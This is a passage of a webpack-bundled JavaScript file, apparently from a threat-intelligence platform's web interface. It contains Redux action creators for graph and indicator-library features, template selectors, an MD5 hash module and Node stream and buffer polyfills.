var toggleActiveFilter = function toggleActiveFilter(filter) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["J" /* SET_FILTERS */],
    payload: filter
  };
};

var undo = function undo() {
  return { type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["P" /* UNDO */] };
};

var redo = function redo() {
  return { type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["y" /* REDO */] };
};

var resetCurrentGraph = function resetCurrentGraph() {
  return { type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["B" /* RESET */] };
};

var deleteCurrentSelection = function deleteCurrentSelection() {
  return { type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["g" /* DELETE_NODES */] };
};

var exportCurrentGraphIndicatorsInCSV = function exportCurrentGraphIndicatorsInCSV() {
  return { type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["l" /* EXPORT_INDICATORS */] };
};

var updateGraphTimeRange = function updateGraphTimeRange(timeRange, id) {
  return { type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["U" /* UPDATE_TIME_RANGE */], payload: { id: id, data: timeRange } };
};

var cacheGraphSimulation = function cacheGraphSimulation(simulation) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["b" /* CACHE_GRAPH_SIMULATION */],
    payload: simulation
  };
};

var saveNote = function saveNote(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["F" /* SAVE_NOTE */],
    payload: payload
  };
};

var updateNote = function updateNote(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["R" /* UPDATE_NOTE */],
    payload: payload
  };
};

var deleteNote = function deleteNote(note) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["i" /* DELETE_NOTE */],
    payload: note
  };
};

var highlightNode = function highlightNode(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["t" /* HIGHLIGHT_NODE */],
    payload: payload
  };
};
var resetHighlightedNode = function resetHighlightedNode(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["D" /* RESET_HIGHLIGHT_NODE */],
    payload: payload
  };
};
var resetBreadcrumbs = function resetBreadcrumbs() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["C" /* RESET_BREADCRUMBS */]
  };
};
var goToBreadcrumb = function goToBreadcrumb(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["s" /* GO_TO_BREADCRUMB */],
    payload: payload
  };
};
var addBreadcrumb = function addBreadcrumb(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["a" /* ADD_BREADCRUMB */],
    payload: payload
  };
};

/***/ }),
/* 577 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchIndicatorList", function() { return fetchIndicatorList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "refreshIndicatorList", function() { return refreshIndicatorList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "storeIndicatorLocally", function() { return storeIndicatorLocally; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "paginateIndicatorList", function() { return paginateIndicatorList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setTimeRange", function() { return setTimeRange; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "setFetchOptions", function() { return setFetchOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "clearIndicatorList", function() { return clearIndicatorList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteIndicator", function() { return deleteIndicator; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchIndicatorMetadata", function() { return fetchIndicatorMetadata; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchIndicatorsForTag", function() { return fetchIndicatorsForTag; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchEnrichment", function() { return fetchEnrichment; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "revertClassification", function() { return revertClassification; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "exportIndicatorList", function() { return exportIndicatorList; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "exportIndicatorsForTag", function() { return exportIndicatorsForTag; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__action_types_js__ = __webpack_require__(241);


/* Fetch the Indicator List */
var fetchIndicatorList = function fetchIndicatorList() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["m" /* FETCH_INDICATOR_LIBRARY */]
  };
};

var refreshIndicatorList = function refreshIndicatorList() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["w" /* REFRESH_INDICATOR_LIST */]
  };
};

var storeIndicatorLocally = function storeIndicatorLocally(indicator) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["D" /* STORE_INDICATOR_LOCAL */],
    payload: indicator
  };
};

/* Fetch the next page of the Indicator Library */
var paginateIndicatorList = function paginateIndicatorList() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["v" /* PAGINATE_INDICATOR_LIST */]
  };
};

/* Set specific time range options for the Indicator List */
var setTimeRange = function setTimeRange() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["B" /* SET_TIME_RANGE */]
  };
};

/* Sets fetch options for indicator library pagination */
var setFetchOptions = function setFetchOptions(options) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["A" /* SET_INDICATOR_FETCH_OPTIONS */],
    payload: options
  };
};

/* Clears the current indicator list */
var clearIndicatorList = function clearIndicatorList() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["a" /* CLEAR_INDICATORS */]
  };
};

/* Deletes an indicator from the given enclaves */
var deleteIndicator = function deleteIndicator(payload) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["b" /* DELETE_INDICATOR */],
    payload: payload
  };
};

/* Fetch existing IOC tags */
var fetchIndicatorMetadata = function fetchIndicatorMetadata(type, value) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["p" /* FETCH_INDICATOR_METADATA */],
    payload: [{ indicatorType: type, value: value }]
  };
};

var fetchIndicatorsForTag = function fetchIndicatorsForTag(guid) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["j" /* FETCH_INDICATORS_FOR_TAG */],
    payload: guid
  };
};

/* Fetch IOC enrichment for selected IOC */
var fetchEnrichment = function fetchEnrichment(type, value) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["s" /* FETCH_IOC_ENRICHMENT */],
    payload: { type: type, value: value }
  };
};

var revertClassification = function revertClassification(reportId, ioc) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["x" /* REVERT_CLASSIFICATION */],
    payload: { reportId: reportId, ioc: ioc }
  };
};

/* Export all the indicators in the current list */
var exportIndicatorList = function exportIndicatorList() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["g" /* EXPORT_INDICATORS_LIST */]
  };
};

/* Export list of indicators with a tag */
var exportIndicatorsForTag = function exportIndicatorsForTag(guid) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_0__action_types_js__["d" /* EXPORT_INDICATORS_FOR_TAG */],
    payload: guid
  };
};

/***/ }),
/* 578 */,
/* 579 */,
/* 580 */,
/* 581 */,
/* 582 */,
/* 583 */,
/* 584 */,
/* 585 */,
/* 586 */,
/* 587 */,
/* 588 */,
/* 589 */,
/* 590 */,
/* 591 */,
/* 592 */,
/* 593 */,
/* 594 */,
/* 595 */,
/* 596 */,
/* 597 */,
/* 598 */,
/* 599 */,
/* 600 */,
/* 601 */,
/* 602 */,
/* 603 */,
/* 604 */,
/* 605 */,
/* 606 */,
/* 607 */,
/* 608 */,
/* 609 */,
/* 610 */,
/* 611 */,
/* 612 */,
/* 613 */,
/* 614 */,
/* 615 */,
/* 616 */,
/* 617 */,
/* 618 */,
/* 619 */,
/* 620 */,
/* 621 */,
/* 622 */,
/* 623 */,
/* 624 */,
/* 625 */,
/* 626 */,
/* 627 */,
/* 628 */,
/* 629 */,
/* 630 */,
/* 631 */,
/* 632 */,
/* 633 */,
/* 634 */,
/* 635 */,
/* 636 */,
/* 637 */,
/* 638 */,
/* 639 */,
/* 640 */,
/* 641 */,
/* 642 */,
/* 643 */,
/* 644 */,
/* 645 */,
/* 646 */,
/* 647 */,
/* 648 */,
/* 649 */,
/* 650 */,
/* 651 */,
/* 652 */,
/* 653 */,
/* 654 */,
/* 655 */,
/* 656 */,
/* 657 */,
/* 658 */,
/* 659 */,
/* 660 */,
/* 661 */,
/* 662 */,
/* 663 */,
/* 664 */,
/* 665 */,
/* 666 */,
/* 667 */,
/* 668 */,
/* 669 */,
/* 670 */,
/* 671 */,
/* 672 */,
/* 673 */,
/* 674 */,
/* 675 */,
/* 676 */,
/* 677 */,
/* 678 */,
/* 679 */,
/* 680 */,
/* 681 */,
/* 682 */,
/* 683 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "loading", function() { return loading; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "displayOptions", function() { return displayOptions; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "template", function() { return template; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "templatesMap", function() { return templatesMap; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "assignableTemplates", function() { return assignableTemplates; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "getInitialFormValues", function() { return getInitialFormValues; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect__ = __webpack_require__(34);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_reselect___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_reselect__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_isstring__ = __webpack_require__(81);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_lodash_isstring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_lodash_isstring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp__ = __webpack_require__(123);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__types_js__ = __webpack_require__(344);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_modules_miscellaneous_getters_js__ = __webpack_require__(345);










var loading = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['templates', 'loading']);
var displayOptions = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['templates', 'options']);

var _templatesMap = Object(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["getterFromKeyPath"])(['templates', 'templates']);

var template = function template(id) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(templatesMap, function (templates) {
    return templates.get(id);
  });
};

var templatesMap = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([_templatesMap, displayOptions], function (templates, options) {
  return templates.filter(function (template) {
    var query = options.get('query');
    var regex = new RegExp(__WEBPACK_IMPORTED_MODULE_4_lodash_escaperegexp___default()(query), 'i');

    // Test all top-level string values
    return template.toSeq().valueSeq().filter(__WEBPACK_IMPORTED_MODULE_3_lodash_isstring___default.a).some(function (x) {
      return x.search(regex) > -1;
    });
  }).sort(__WEBPACK_IMPORTED_MODULE_0_trustar_utils__["alphabetize"]);
});

// whether enclaves from this template can be directly managed
var canManageEnclave = function canManageEnclave(template, subscriptionMethods) {
  var subscriptionMethod = subscriptionMethods.get(template.get('subscriptionMethod'));
  return subscriptionMethod.get('canManageEnclave');
};

// the templates that can be manually assigned to enclaves through admin flow
var assignableTemplates = Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])([templatesMap, __WEBPACK_IMPORTED_MODULE_6_modules_miscellaneous_getters_js__["subscriptionMethods"]], function (templatesMap, subscriptionMethods) {
  return templatesMap.filter(function (t) {
    return canManageEnclave(t, subscriptionMethods);
  });
});

// Determine initial form values for template add/edit form
var getInitialFormValues = function getInitialFormValues(template) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_reselect__["createSelector"])(__WEBPACK_IMPORTED_MODULE_6_modules_miscellaneous_getters_js__["accessTypes"], __WEBPACK_IMPORTED_MODULE_6_modules_miscellaneous_getters_js__["credentialsTypes"], __WEBPACK_IMPORTED_MODULE_6_modules_miscellaneous_getters_js__["labels"], __WEBPACK_IMPORTED_MODULE_6_modules_miscellaneous_getters_js__["subscriptionMethods"], __WEBPACK_IMPORTED_MODULE_6_modules_miscellaneous_getters_js__["getDefaultEntityTypes"], function (accessTypes, credentialsTypes, labels, subscriptionMethods, defaultEntityTypes) {
    return !template ? Object(__WEBPACK_IMPORTED_MODULE_5__types_js__["c" /* _EnclaveTemplate */])({}) : Object(__WEBPACK_IMPORTED_MODULE_5__types_js__["c" /* _EnclaveTemplate */])(template.update('credentialsType', function (x) {
      return credentialsTypes.get(x);
    }).update('label', function (x) {
      return labels.get(x);
    }).update('subscriptionMethod', function (x) {
      return subscriptionMethods.get(x);
    }));
  });
};

/***/ }),
/* 684 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";

var inherits = __webpack_require__(25)
var HashBase = __webpack_require__(1234)
var Buffer = __webpack_require__(41).Buffer

var ARRAY16 = new Array(16)

function MD5 () {
  HashBase.call(this, 64)

  // state
  this._a = 0x67452301
  this._b = 0xefcdab89
  this._c = 0x98badcfe
  this._d = 0x10325476
}

inherits(MD5, HashBase)

MD5.prototype._update = function () {
  var M = ARRAY16
  for (var i = 0; i < 16; ++i) M[i] = this._block.readInt32LE(i * 4)

  var a = this._a
  var b = this._b
  var c = this._c
  var d = this._d

  a = fnF(a, b, c, d, M[0], 0xd76aa478, 7)
  d = fnF(d, a, b, c, M[1], 0xe8c7b756, 12)
  c = fnF(c, d, a, b, M[2], 0x242070db, 17)
  b = fnF(b, c, d, a, M[3], 0xc1bdceee, 22)
  a = fnF(a, b, c, d, M[4], 0xf57c0faf, 7)
  d = fnF(d, a, b, c, M[5], 0x4787c62a, 12)
  c = fnF(c, d, a, b, M[6], 0xa8304613, 17)
  b = fnF(b, c, d, a, M[7], 0xfd469501, 22)
  a = fnF(a, b, c, d, M[8], 0x698098d8, 7)
  d = fnF(d, a, b, c, M[9], 0x8b44f7af, 12)
  c = fnF(c, d, a, b, M[10], 0xffff5bb1, 17)
  b = fnF(b, c, d, a, M[11], 0x895cd7be, 22)
  a = fnF(a, b, c, d, M[12], 0x6b901122, 7)
  d = fnF(d, a, b, c, M[13], 0xfd987193, 12)
  c = fnF(c, d, a, b, M[14], 0xa679438e, 17)
  b = fnF(b, c, d, a, M[15], 0x49b40821, 22)

  a = fnG(a, b, c, d, M[1], 0xf61e2562, 5)
  d = fnG(d, a, b, c, M[6], 0xc040b340, 9)
  c = fnG(c, d, a, b, M[11], 0x265e5a51, 14)
  b = fnG(b, c, d, a, M[0], 0xe9b6c7aa, 20)
  a = fnG(a, b, c, d, M[5], 0xd62f105d, 5)
  d = fnG(d, a, b, c, M[10], 0x02441453, 9)
  c = fnG(c, d, a, b, M[15], 0xd8a1e681, 14)
  b = fnG(b, c, d, a, M[4], 0xe7d3fbc8, 20)
  a = fnG(a, b, c, d, M[9], 0x21e1cde6, 5)
  d = fnG(d, a, b, c, M[14], 0xc33707d6, 9)
  c = fnG(c, d, a, b, M[3], 0xf4d50d87, 14)
  b = fnG(b, c, d, a, M[8], 0x455a14ed, 20)
  a = fnG(a, b, c, d, M[13], 0xa9e3e905, 5)
  d = fnG(d, a, b, c, M[2], 0xfcefa3f8, 9)
  c = fnG(c, d, a, b, M[7], 0x676f02d9, 14)
  b = fnG(b, c, d, a, M[12], 0x8d2a4c8a, 20)

  a = fnH(a, b, c, d, M[5], 0xfffa3942, 4)
  d = fnH(d, a, b, c, M[8], 0x8771f681, 11)
  c = fnH(c, d, a, b, M[11], 0x6d9d6122, 16)
  b = fnH(b, c, d, a, M[14], 0xfde5380c, 23)
  a = fnH(a, b, c, d, M[1], 0xa4beea44, 4)
  d = fnH(d, a, b, c, M[4], 0x4bdecfa9, 11)
  c = fnH(c, d, a, b, M[7], 0xf6bb4b60, 16)
  b = fnH(b, c, d, a, M[10], 0xbebfbc70, 23)
  a = fnH(a, b, c, d, M[13], 0x289b7ec6, 4)
  d = fnH(d, a, b, c, M[0], 0xeaa127fa, 11)
  c = fnH(c, d, a, b, M[3], 0xd4ef3085, 16)
  b = fnH(b, c, d, a, M[6], 0x04881d05, 23)
  a = fnH(a, b, c, d, M[9], 0xd9d4d039, 4)
  d = fnH(d, a, b, c, M[12], 0xe6db99e5, 11)
  c = fnH(c, d, a, b, M[15], 0x1fa27cf8, 16)
  b = fnH(b, c, d, a, M[2], 0xc4ac5665, 23)

  a = fnI(a, b, c, d, M[0], 0xf4292244, 6)
  d = fnI(d, a, b, c, M[7], 0x432aff97, 10)
  c = fnI(c, d, a, b, M[14], 0xab9423a7, 15)
  b = fnI(b, c, d, a, M[5], 0xfc93a039, 21)
  a = fnI(a, b, c, d, M[12], 0x655b59c3, 6)
  d = fnI(d, a, b, c, M[3], 0x8f0ccc92, 10)
  c = fnI(c, d, a, b, M[10], 0xffeff47d, 15)
  b = fnI(b, c, d, a, M[1], 0x85845dd1, 21)
  a = fnI(a, b, c, d, M[8], 0x6fa87e4f, 6)
  d = fnI(d, a, b, c, M[15], 0xfe2ce6e0, 10)
  c = fnI(c, d, a, b, M[6], 0xa3014314, 15)
  b = fnI(b, c, d, a, M[13], 0x4e0811a1, 21)
  a = fnI(a, b, c, d, M[4], 0xf7537e82, 6)
  d = fnI(d, a, b, c, M[11], 0xbd3af235, 10)
  c = fnI(c, d, a, b, M[2], 0x2ad7d2bb, 15)
  b = fnI(b, c, d, a, M[9], 0xeb86d391, 21)

  this._a = (this._a + a) | 0
  this._b = (this._b + b) | 0
  this._c = (this._c + c) | 0
  this._d = (this._d + d) | 0
}

MD5.prototype._digest = function () {
  // create padding and handle blocks
  this._block[this._blockOffset++] = 0x80
  if (this._blockOffset > 56) {
    this._block.fill(0, this._blockOffset, 64)
    this._update()
    this._blockOffset = 0
  }

  this._block.fill(0, this._blockOffset, 56)
  this._block.writeUInt32LE(this._length[0], 56)
  this._block.writeUInt32LE(this._length[1], 60)
  this._update()

  // produce result
  var buffer = Buffer.allocUnsafe(16)
  buffer.writeInt32LE(this._a, 0)
  buffer.writeInt32LE(this._b, 4)
  buffer.writeInt32LE(this._c, 8)
  buffer.writeInt32LE(this._d, 12)
  return buffer
}

function rotl (x, n) {
  return (x << n) | (x >>> (32 - n))
}

function fnF (a, b, c, d, m, k, s) {
  return (rotl((a + ((b & c) | ((~b) & d)) + m + k) | 0, s) + b) | 0
}

function fnG (a, b, c, d, m, k, s) {
  return (rotl((a + ((b & d) | (c & (~d))) + m + k) | 0, s) + b) | 0
}

function fnH (a, b, c, d, m, k, s) {
  return (rotl((a + (b ^ c ^ d) + m + k) | 0, s) + b) | 0
}

function fnI (a, b, c, d, m, k, s) {
  return (rotl((a + ((c ^ (b | (~d)))) + m + k) | 0, s) + b) | 0
}

module.exports = MD5


/***/ }),
/* 685 */
/***/ (function(module, exports, __webpack_require__) {

// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.

module.exports = Stream;

var EE = __webpack_require__(275).EventEmitter;
var inherits = __webpack_require__(25);

inherits(Stream, EE);
Stream.Readable = __webpack_require__(686);
Stream.Writable = __webpack_require__(2669);
Stream.Duplex = __webpack_require__(2670);
Stream.Transform = __webpack_require__(2671);
Stream.PassThrough = __webpack_require__(2672);

// Backwards-compat with node 0.4.x
Stream.Stream = Stream;



// old-style streams.  Note that the pipe method (the only relevant
// part of this class) is overridden in the Readable class.

function Stream() {
  EE.call(this);
}

Stream.prototype.pipe = function(dest, options) {
  var source = this;

  function ondata(chunk) {
    if (dest.writable) {
      if (false === dest.write(chunk) && source.pause) {
        source.pause();
      }
    }
  }

  source.on('data', ondata);

  function ondrain() {
    if (source.readable && source.resume) {
      source.resume();
    }
  }

  dest.on('drain', ondrain);

  // If the 'end' option is not supplied, dest.end() will be called when
  // source gets the 'end' or 'close' events.  Only dest.end() once.
  if (!dest._isStdio && (!options || options.end !== false)) {
    source.on('end', onend);
    source.on('close', onclose);
  }

  var didOnEnd = false;
  function onend() {
    if (didOnEnd) return;
    didOnEnd = true;

    dest.end();
  }


  function onclose() {
    if (didOnEnd) return;
    didOnEnd = true;

    if (typeof dest.destroy === 'function') dest.destroy();
  }

  // don't leave dangling pipes when there are errors.
  function onerror(er) {
    cleanup();
    if (EE.listenerCount(this, 'error') === 0) {
      throw er; // Unhandled stream error in pipe.
    }
  }

  source.on('error', onerror);
  dest.on('error', onerror);

  // remove all the event listeners that were added.
  function cleanup() {
    source.removeListener('data', ondata);
    dest.removeListener('drain', ondrain);

    source.removeListener('end', onend);
    source.removeListener('close', onclose);

    source.removeListener('error', onerror);
    dest.removeListener('error', onerror);

    source.removeListener('end', cleanup);
    source.removeListener('close', cleanup);

    dest.removeListener('close', cleanup);
  }

  source.on('end', cleanup);
  source.on('close', cleanup);

  dest.on('close', cleanup);

  dest.emit('pipe', source);

  // Allow for unix-like usage: A.pipe(B).pipe(C)
  return dest;
};


/***/ }),
/* 686 */
/***/ (function(module, exports, __webpack_require__) {

exports = module.exports = __webpack_require__(1235);
exports.Stream = exports;
exports.Readable = exports;
exports.Writable = __webpack_require__(688);
exports.Duplex = __webpack_require__(237);
exports.Transform = __webpack_require__(1238);
exports.PassThrough = __webpack_require__(2668);


/***/ }),
/* 687 */
/***/ (function(module, exports, __webpack_require__) {

/* eslint-disable node/no-deprecated-api */
var buffer = __webpack_require__(43)
var Buffer = buffer.Buffer

// alternative to using Object.keys for old browsers
function copyProps (src, dst) {
  for (var key in src) {
    dst[key] = src[key]
  }
}
if (Buffer.from && Buffer.alloc && Buffer.allocUnsafe && Buffer.allocUnsafeSlow) {
  module.exports = buffer
} else {
  // Copy properties from require('buffer')
  copyProps(buffer, exports)
  exports.Buffer = SafeBuffer
}

function SafeBuffer (arg, encodingOrOffset, length) {
  return Buffer(arg, encodingOrOffset, length)
}

// Copy static methods from Buffer
copyProps(Buffer, SafeBuffer)

SafeBuffer.from = function (arg, encodingOrOffset, length) {
  if (typeof arg === 'number') {
    throw new TypeError('Argument must not be a number')
  }
  return Buffer(arg, encodingOrOffset, length)
}

SafeBuffer.alloc = function (size, fill, encoding) {
  if (typeof size !== 'number') {
    throw new TypeError('Argument must be a number')
  }
  var buf = Buffer(size)
  if (fill !== undefined) {
    if (typeof encoding === 'string') {
      buf.fill(fill, encoding)
    } else {
      buf.fill(fill)
    }
  } else {
    buf.fill(0)
  }
  return buf
}

SafeBuffer.allocUnsafe = function (size) {
  if (typeof size !== 'number') {
    throw new TypeError('Argument must be a number')
  }
  return Buffer(size)
}

SafeBuffer.allocUnsafeSlow = function (size) {
  if (typeof size !== 'number') {
    throw new TypeError('Argument must be a number')
  }
  return buffer.SlowBuffer(size)
}


/***/ }),
/* 688 */
/***/ (function(module, exports, __webpack_require__) {

"use strict";
/* WEBPACK VAR INJECTION */(function(process, setImmediate, global) {// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.

// A bit simpler than readable streams.
// Implement an async ._write(chunk, encoding, cb), and it'll handle all
// the drain event emission and buffering.



/*<replacement>*/

var pna = __webpack_require__(486);
/*</replacement>*/

module.exports = Writable;

/* <replacement> */
function WriteReq(chunk, encoding, cb) {
  this.chunk = chunk;
  this.encoding = encoding;
  this.callback = cb;
  this.next = null;
}

// It seems a linked list but it is not
// there will be only 2 of these for each stream
function CorkedRequest(state) {
  var _this = this;

  this.next = null;
  this.entry = null;
  this.finish = function () {
    onCorkedFinish(_this, state);
  };
}
/* </replacement> */

/*<replacement>*/
var asyncWrite = !process.browser && ['v0.10', 'v0.9.'].indexOf(process.version.slice(0, 5)) > -1 ? setImmediate : pna.nextTick;
/*</replacement>*/

/*<replacement>*/
var Duplex;
/*</replacement>*/

Writable.WritableState = WritableState;

/*<replacement>*/
var util = __webpack_require__(347);
util.inherits = __webpack_require__(348);
/*</replacement>*/

/*<replacement>*/
var internalUtil = {
  deprecate: __webpack_require__(2666)
};
/*</replacement>*/

/*<replacement>*/
var Stream = __webpack_require__(1236);
/*</replacement>*/

/*<replacement>*/

var Buffer = __webpack_require__(687).Buffer;
var OurUint8Array = global.Uint8Array || function () {};
function _uint8ArrayToBuffer(chunk) {
  return Buffer.from(chunk);
}
function _isUint8Array(obj) {
  return Buffer.isBuffer(obj) || obj instanceof OurUint8Array;
}

/*</replacement>*/

var destroyImpl = __webpack_require__(1237);

util.inherits(Writable, Stream);

function nop() {}

function WritableState(options, stream) {
  Duplex = Duplex || __webpack_require__(237);

  options = options || {};

  // Duplex streams are both readable and writable, but share
  // the same options object.
  // However, some cases require setting options to different
  // values for the readable and the writable sides of the duplex stream.
  // These options can be provided separately as readableXXX and writableXXX.
  var isDuplex = stream instanceof Duplex;

  // object stream flag to indicate whether or not this stream
  // contains buffers or objects.
  this.objectMode = !!options.objectMode;

  if (isDuplex) this.objectMode = this.objectMode || !!options.writableObjectMode;

  // the point at which write() starts returning false
  // Note: 0 is a valid value, means that we always return false if
  // the entire buffer is not flushed immediately on write()
  var hwm = options.highWaterMark;
  var writableHwm = options.writableHighWaterMark;
  var defaultHwm = this.objectMode ? 16 : 16 * 1024;

  if (hwm || hwm === 0) this.highWaterMark = hwm;else if (isDuplex && (writableHwm || writableHwm === 0)) this.highWaterMark = writableHwm;else this.highWaterMark = defaultHwm;

  // cast to ints.
  this.highWaterMark = Math.floor(this.highWaterMark);

  // if _final has been called
  this.finalCalled = false;

  // drain event flag.
  this.needDrain = false;
  // at the start of calling end()
  this.ending = false;
  // when end() has been called, and returned
  this.ended = false;
  // when 'finish' is emitted
  this.finished = false;

  // has it been destroyed
  this.destroyed = false;

  // should we decode strings into buffers before passing to _write?
  // this is here so that some node-core streams can optimize string
  // handling at a lower level.
  var noDecode = options.decodeStrings === false;
  this.decodeStrings = !noDecode;

  // Crypto is kind of old and crusty.  Historically, its default string
  // encoding is 'binary' so we have to make this configurable.
  // Everything else in the universe uses 'utf8', though.
  this.defaultEncoding = options.defaultEncoding || 'utf8';

  // not an actual buffer we keep track of, but a measurement
  // of how much we're waiting to get pushed to some underlying
  // socket or file.
  this.length = 0;

  // a flag to see when we're in the middle of a write.
  this.writing = false;

  // when true all writes will be buffered until .uncork() call
  this.corked = 0;

  // a flag to be able to tell if the onwrite cb is called immediately,
  // or on a later tick.  We set this to true at first, because any
  // actions that shouldn't happen until "later" should generally also
  // not happen before the first write call.
  this.sync = true;

  // a flag to know if we're processing previously buffered items, which
  // may call the _write() callback in the same tick, so that we don't
  // end up in an overlapped onwrite situation.
  this.bufferProcessing = false;

  // the callback that's passed to _write(chunk,cb)
  this.onwrite = function (er) {
    onwrite(stream, er);
  };

